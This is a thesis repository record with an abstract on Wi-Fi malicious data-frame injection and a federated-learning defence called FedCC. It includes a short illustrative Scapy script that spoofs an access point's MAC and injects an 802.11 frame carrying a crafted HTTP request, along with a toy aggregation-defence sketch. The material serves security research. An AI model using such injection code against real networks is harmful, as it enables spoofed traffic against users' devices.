Adversarial Attack and Defense in AI-based Mobile Cloud Computing Systems
- Abstract
- Mobile cloud computing (MCC) uses cloud-server computing technology to provide various application services to mobile clients.
The MCC framework delivers cloud computing resources to clients through systematic communication and builds artificial intelligence (AI)-based services using data collected from clients.
In an MCC environment, federated learning (FL) techniques address both data privacy and data collection costs, because the cloud server trains a global model from each client's locally trained model without the clients' data ever being stored in the cloud.
However, AI-based MCC services built on federated learning are exposed to malicious-client attacks, such as the exploitation of vulnerabilities in various network environments. Moreover, the FL framework is particularly vulnerable to such attacks because it allows open participation by arbitrary mobile devices.
In this dissertation, we consider the security issues that can arise both in the network communication between cloud servers and clients and in the federated learning process itself.
In the first part of this dissertation, we introduce malicious data frame injection attacks in IEEE 802.11 wireless LAN environments that use a covert jamming technique and therefore do not require hijacking the association between an access point (AP) and its clients.
We implement the proposed attack node using software-defined radios (SDRs) to transmit jamming signals and manipulated Wi-Fi medium access control (MAC) frames.
In addition, we use the Python Scapy library with wireless LAN cards to transmit malicious data frames containing malformed HTTP request payloads.
We build a testbed in which MCC clients and servers communicate over the HTTP application protocol through IEEE 802.11 and show that the proposed attack remains effective even in the presence of encryption protocols such as WPA2.
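To make the frame-injection step concrete, the following is a minimal Scapy sketch of crafting and sending an 802.11 data frame that carries a bogus HTTP request. All MAC/IP addresses, ports, TCP sequence numbers, and the interface name are hypothetical placeholders, not values from the dissertation; a monitor-mode interface and root privileges are assumed, and the covert jamming and WPA2 handling described above are omitted.

```python
# Illustrative sketch only: placeholder addresses and TCP state,
# no jamming and no encryption handling.
from scapy.all import RadioTap, Dot11, LLC, SNAP, IP, TCP, Raw, sendp

IFACE      = "wlan0mon"             # hypothetical monitor-mode interface
AP_MAC     = "00:11:22:33:44:55"    # hypothetical AP (BSSID)
CLIENT_MAC = "66:77:88:99:aa:bb"    # hypothetical victim client

# 802.11 data frame (type=2) with the from-DS bit set, so the victim
# client treats it as arriving from the AP.
dot11 = Dot11(type=2, subtype=0, FCfield="from-DS",
              addr1=CLIENT_MAC,            # receiver
              addr2=AP_MAC,                # transmitter (spoofed)
              addr3="de:ad:be:ef:00:01")   # claimed original source

# Deliberately wrong HTTP request used as the injected payload.
http = b"GET /malicious HTTP/1.1\r\nHost: target.example\r\n\r\n"

# seq/ack are placeholders; a real injection must match the victim's
# current TCP state, which the covert jamming technique helps control.
frame = (RadioTap() / dot11 / LLC() / SNAP() /
         IP(src="10.0.0.1", dst="10.0.0.2") /
         TCP(sport=80, dport=52000, flags="PA", seq=1000, ack=2000) /
         Raw(load=http))

sendp(frame, iface=IFACE, verbose=False)   # requires root privileges
```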
In the second part of this dissertation, we propose federated learning with consensus confirmation (FedCC), which applies a global-model contamination verification algorithm that is robust against malicious-client attacks.
In addition, we define attack success probabilities in the presence of malicious clients in a federated learning environment and show that FedCC is more robust than previous FL algorithms.
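The abstract does not reproduce the formal definition of these attack success probabilities. As a purely illustrative example, if each of the $K$ clients selected in a round is malicious independently with probability $p$, the probability that malicious clients form a strict majority of the round is

$$P_{\text{attack}} = \sum_{m=\lfloor K/2 \rfloor + 1}^{K} \binom{K}{m} p^{m} (1-p)^{K-m},$$

which is one common way such quantities are modeled; the dissertation's actual definition may differ.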
Through experiments on the MNIST and Fashion-MNIST datasets, we demonstrate that the proposed consensus confirmation rule can be applied to various FL algorithms, and we show that FedCC is safer than previous FL algorithms under data poisoning and model poisoning attacks.
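As a rough illustration of what a consensus-confirmation step layered on FedAvg-style aggregation might look like, here is a minimal Python/NumPy sketch. The abstract does not spell out FedCC's exact rule, so the quorum vote below (a majority of verifier clients must confirm that the candidate global model does not degrade their validation accuracy) is an illustrative stand-in, not the dissertation's algorithm; all class and function names are hypothetical.

```python
# Hypothetical sketch of consensus-confirmed federated averaging.
import numpy as np

class ToyClient:
    """Stand-in for a federated client with local data."""
    def __init__(self, num_samples, rng):
        self.num_samples = num_samples
        self.rng = rng

    def local_train(self, global_w):
        # Placeholder for local SGD: perturb the global weights slightly.
        return global_w + self.rng.normal(0.0, 0.01, size=global_w.shape)

    def validation_accuracy(self, w):
        # Placeholder metric: smaller weights "score" higher here.
        return float(np.clip(1.0 - np.abs(w).mean(), 0.0, 1.0))

def fedavg(updates, sizes):
    """Sample-size-weighted average of client updates (standard FedAvg)."""
    total = float(sum(sizes))
    return sum(w * (n / total) for w, n in zip(updates, sizes))

def consensus_confirmed(candidate, previous, verifiers, quorum=0.5, tol=0.01):
    """Accept the candidate only if a quorum of verifiers sees no
    noticeable accuracy drop relative to the previous global model."""
    votes = [v.validation_accuracy(candidate)
             >= v.validation_accuracy(previous) - tol for v in verifiers]
    return np.mean(votes) > quorum

def federated_round(global_w, trainers, verifiers):
    updates = [c.local_train(global_w) for c in trainers]
    sizes = [c.num_samples for c in trainers]
    candidate = fedavg(updates, sizes)
    # Reject a (possibly poisoned) aggregate instead of letting it
    # contaminate the next round's global model.
    if consensus_confirmed(candidate, global_w, verifiers):
        return candidate
    return global_w

rng = np.random.default_rng(0)
clients = [ToyClient(100, rng) for _ in range(10)]
global_w = np.zeros(8)
for _ in range(3):
    global_w = federated_round(global_w, clients[:7], clients[7:])
```

The rollback on a failed vote reflects the general idea of contamination verification: a suspect aggregate is discarded rather than propagated, which is why such a check can in principle be layered on top of different FL aggregation rules.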
- Author(s)
- Woocheol Kim
- Issued Date
- 2023
- Type
- Thesis
- URI
- https://scholar.gist.ac.kr/handle/local/18846
- Access and License
-
- File List
-
Items in Repository are protected by copyright, with all rights reserved, unless otherwise indicated.